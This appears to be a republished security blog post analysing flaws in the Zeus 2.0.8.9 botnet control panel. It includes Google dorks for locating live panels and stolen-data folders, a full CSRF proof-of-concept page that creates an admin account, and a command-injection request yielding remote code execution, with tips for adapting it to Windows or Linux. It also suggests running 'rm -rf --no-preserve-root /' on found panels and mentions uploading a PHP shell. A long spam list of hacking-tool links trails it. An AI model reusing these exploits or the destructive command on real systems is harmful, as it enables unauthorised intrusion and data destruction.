Wednesday, January 24, 2024

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
  • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
Read more

  1. Hacking App
  2. Pentest Tools Website Vulnerability
  3. Pentest Tools Open Source
  4. Pentest Reporting Tools
  5. Hacking Tools Software
  6. Pentest Tools Apk
  7. How To Hack
  8. Pentest Tools For Windows
  9. Pentest Tools Bluekeep
  10. Underground Hacker Sites
  11. Hacker Tools Free Download
  12. Hack Tools For Windows
  13. Hacking Tools 2020
  14. Easy Hack Tools
  15. What Is Hacking Tools
  16. Hacking Tools Online
  17. What Are Hacking Tools
  18. Hacking Tools Usb
  19. Hacker
  20. Hacker Tools 2020
  21. Pentest Tools For Ubuntu
  22. Pentest Tools Nmap
  23. Tools 4 Hack
  24. Pentest Tools Tcp Port Scanner
  25. Best Hacking Tools 2019
  26. Wifi Hacker Tools For Windows
  27. Hak5 Tools
  28. Hacker Tools 2019
  29. Hacking App
  30. Pentest Tools Port Scanner
  31. Hack Apps
  32. Best Hacking Tools 2019
  33. Hacker Tools Apk Download
  34. Hack Tools 2019
  35. Top Pentest Tools
  36. Hak5 Tools
  37. Pentest Tools Open Source
  38. Best Hacking Tools 2019
  39. Computer Hacker
  40. Hacker Tools For Windows
  41. How To Hack
  42. Pentest Tools For Ubuntu
  43. New Hack Tools
  44. Hack And Tools
  45. How To Install Pentest Tools In Ubuntu
  46. Usb Pentest Tools
  47. Hack And Tools
  48. Tools 4 Hack
  49. Pentest Tools Download
  50. Usb Pentest Tools
  51. Pentest Tools Subdomain
  52. Hacker Tools Online
  53. Pentest Tools Url Fuzzer
  54. Hacking Tools Name
  55. Hacker Tools Software
  56. Pentest Tools Framework
  57. Hacker Tools 2020
  58. Hacker Tool Kit
  59. Hacker Tools Apk Download
  60. Hacker Tools 2020
  61. Hacker Search Tools
  62. Pentest Tools Nmap
  63. Hack Tools For Ubuntu
  64. Hacker Tool Kit
  65. Hacking Tools Pc
  66. Black Hat Hacker Tools
  67. Pentest Tools Subdomain
  68. Hack Apps
  69. Pentest Tools Open Source
  70. Hack Tools For Windows
  71. Hacker Tools For Ios
  72. Hacker Tools Apk
  73. Best Hacking Tools 2019
  74. Pentest Tools For Mac
  75. Pentest Tools Windows
  76. Hacker Tools For Windows
  77. Hack Tool Apk
  78. Termux Hacking Tools 2019
  79. Pentest Tools Apk
  80. Pentest Tools Tcp Port Scanner
  81. Pentest Tools Website
  82. Usb Pentest Tools
  83. Pentest Reporting Tools
  84. Hacking Tools For Beginners
  85. Tools For Hacker

No comments:

Post a Comment